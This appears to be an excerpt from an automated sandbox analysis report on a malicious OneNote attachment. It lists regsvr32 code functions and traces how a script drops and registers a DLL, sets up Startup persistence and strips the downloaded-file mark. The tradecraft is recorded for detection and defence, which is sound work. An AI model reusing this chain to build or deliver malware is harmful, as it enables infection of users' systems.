                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259CF7012_2_0259CF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02594F1812_2_02594F18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259E31012_2_0259E310
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258EF1412_2_0258EF14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02593B1412_2_02593B14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258D33C12_2_0258D33C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02593FD012_2_02593FD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02582FD412_2_02582FD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025833D412_2_025833D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025997CC12_2_025997CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258A7F012_2_0258A7F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A27EC12_2_025A27EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02581B9412_2_02581B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259538412_2_02595384
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258FFB812_2_0258FFB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02598BB812_2_02598BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02588FB012_2_02588FB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258DBA012_2_0258DBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259C05812_2_0259C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A545012_2_025A5450
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259C44C12_2_0259C44C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258784012_2_02587840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02582C7812_2_02582C78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258C07812_2_0258C078
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258B07C12_2_0258B07C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02596C7012_2_02596C70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258D47412_2_0258D474
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259B46012_2_0259B460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A181C12_2_025A181C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258940812_2_02589408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02587C0812_2_02587C08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258100012_2_02581000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258B83C12_2_0258B83C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259103012_2_02591030
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259EC3012_2_0259EC30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025818DC12_2_025818DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025814D412_2_025814D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02593CD412_2_02593CD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025880CC12_2_025880CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025908CC12_2_025908CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258F8C412_2_0258F8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02595CC412_2_02595CC4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025890F812_2_025890F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025848FC12_2_025848FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02583CF412_2_02583CF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025920E012_2_025920E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258AC9412_2_0258AC94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259588012_2_02595880
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02584C8412_2_02584C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259CC8412_2_0259CC84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258DCB812_2_0258DCB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A94BC12_2_025A94BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259A8B012_2_0259A8B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025898AC12_2_025898AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259751812_2_02597518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A991012_2_025A9910
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259610C12_2_0259610C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025A850012_2_025A8500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258613812_2_02586138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258753012_2_02587530
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259B13012_2_0259B130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259AD2812_2_0259AD28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02594D2012_2_02594D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259192412_2_02591924
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025915C812_2_025915C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259D5F012_2_0259D5F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025895BC12_2_025895BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259BDA012_2_0259BDA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_008E000013_2_008E0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009308CC13_2_009308CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092CC1413_2_0092CC14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00927D6C13_2_00927D6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094061813_2_00940618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009473A413_2_009473A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009263A413_2_009263A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00933FD013_2_00933FD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00928BC813_2_00928BC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00938FC813_2_00938FC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00929B7913_2_00929B79
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094149413_2_00941494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092AC9413_2_0092AC94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093709C13_2_0093709C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093588013_2_00935880
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00924C8413_2_00924C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093CC8413_2_0093CC84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094488C13_2_0094488C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093A8B013_2_0093A8B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009494BC13_2_009494BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092DCB813_2_0092DCB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009444A813_2_009444A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009298AC13_2_009298AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00941CD413_2_00941CD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009214D413_2_009214D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00933CD413_2_00933CD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009218DC13_2_009218DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092F8C413_2_0092F8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00935CC413_2_00935CC4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009280CC13_2_009280CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00923CF413_2_00923CF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009290F813_2_009290F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009248FC13_2_009248FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009320E013_2_009320E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092741013_2_00927410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094181C13_2_0094181C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092100013_2_00921000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093A00013_2_0093A000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092940813_2_00929408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00927C0813_2_00927C08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093103013_2_00931030
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093EC3013_2_0093EC30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092B83C13_2_0092B83C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094545013_2_00945450
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093C05813_2_0093C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092784013_2_00927840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093C44C13_2_0093C44C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00936C7013_2_00936C70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092D47413_2_0092D474
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00922C7813_2_00922C78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092C07813_2_0092C078
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092B07C13_2_0092B07C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093B46013_2_0093B460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094586813_2_00945868
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009295BC13_2_009295BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093BDA013_2_0093BDA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009315C813_2_009315C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093D5F013_2_0093D5F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094991013_2_00949910
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093751813_2_00937518
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094850013_2_00948500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094210013_2_00942100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093610C13_2_0093610C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093B13013_2_0093B130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092613813_2_00926138
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00934D2013_2_00934D20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093192413_2_00931924
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093AD2813_2_0093AD28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00944D6413_2_00944D64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092BE9013_2_0092BE90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00934A9013_2_00934A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00942E8413_2_00942E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00944E8C13_2_00944E8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00928A8C13_2_00928A8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00942AB013_2_00942AB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092AAB813_2_0092AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00924EB813_2_00924EB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00937EBE13_2_00937EBE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00923ABC13_2_00923ABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093A6BC13_2_0093A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009396D413_2_009396D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093EAC013_2_0093EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092D6CC13_2_0092D6CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009292F013_2_009292F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009436FC13_2_009436FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092421413_2_00924214
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092461C13_2_0092461C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00935A0013_2_00935A00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00948A0013_2_00948A00
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00938E0813_2_00938E08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00923E0C13_2_00923E0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093020C13_2_0093020C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092263C13_2_0092263C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092BA2C13_2_0092BA2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00938A2C13_2_00938A2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00930E2C13_2_00930E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093662C13_2_0093662C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092B25813_2_0092B258
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092F65C13_2_0092F65C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093A24413_2_0093A244
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00946E4813_2_00946E48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00930A7013_2_00930A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092327413_2_00923274
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092A66013_2_0092A660
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00921B9413_2_00921B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093779A13_2_0093779A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093538413_2_00935384
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00928FB013_2_00928FB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092FFB813_2_0092FFB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00938BB813_2_00938BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092DBA013_2_0092DBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009447A813_2_009447A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00922FD413_2_00922FD4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009233D413_2_009233D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009397CC13_2_009397CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092A7F013_2_0092A7F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093FFFC13_2_0093FFFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_009427EC13_2_009427EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093E31013_2_0093E310
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0094831013_2_00948310
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092EF1413_2_0092EF14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00933B1413_2_00933B14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00945B1C13_2_00945B1C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00934F1813_2_00934F18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092D33C13_2_0092D33C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093E75013_2_0093E750
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092475813_2_00924758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092975C13_2_0092975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093D77013_2_0093D770
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093CF7013_2_0093CF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092837813_2_00928378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0092F77C13_2_0092F77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00948B6813_2_00948B68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,12_2_0000000180010C10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,12_2_0000000180010AC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,12_2_0000000180010DB0
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                      Source: Insight_Medical_Publishing_1.oneReversingLabs: Detection: 33%
                      Source: Insight_Medical_Publishing_1.oneVirustotal: Detection: 42%
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_1.one
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll"
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll"
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsrJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                      Source: Send to OneNote.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{0236116B-B959-44EF-9D39-2E715CD22D7B}Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{E358F697-0D01-4E39-B580-A57605B896E6} - OProcSessId.datJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winONE@12/693@1/50
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02588BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,12_2_02588BC8
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0000000180005C69 push rdi; ret 12_2_0000000180005C72
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_00000001800056DD push rdi; ret 12_2_00000001800056E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258A26E push ebp; ret 12_2_0258A26F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02589E8B push eax; retf 12_2_02589E8E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02597EAF push 458BCC5Ah; retf 12_2_02597EBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0259C731 push esi; iretd 12_2_0259C732
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02586CDE push esi; iretd 12_2_02586CDF
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_025980D7 push ebp; retf 12_2_025980D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258A0FC push ebp; iretd 12_2_0258A0FD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02586C9F pushad ; ret 12_2_02586CAA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02589D51 push ebp; retf 12_2_02589D5A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02598157 push ebp; retf 12_2_02598158
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02597D4E push ebp; iretd 12_2_02597D4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02597D3C push ebp; retf 12_2_02597D3D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02597D25 push 4D8BFFFFh; retf 12_2_02597D2A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0258A1D2 push ebp; iretd 12_2_0258A1D3
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_02597987 push ebp; iretd 12_2_0259798F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00946D34 push edi; ret 13_2_00946D36
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00937D3C push ebp; retf 13_2_00937D3D
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00937D25 push 4D8BFFFFh; retf 13_2_00937D2A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00937D4E push ebp; iretd 13_2_00937D4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00937EAF push 458BCC5Ah; retf 13_2_00937EBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_0093C731 push esi; iretd 13_2_0093C732
                      Source: rad617F4.tmp.dll.10.drStatic PE information: section name: _RDATA
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dll
                      Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\rad617F4.tmp.dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll (copy)Jump to dropped file
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\FtYcgioKSiXTtw\clpHRoMLOOCr.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
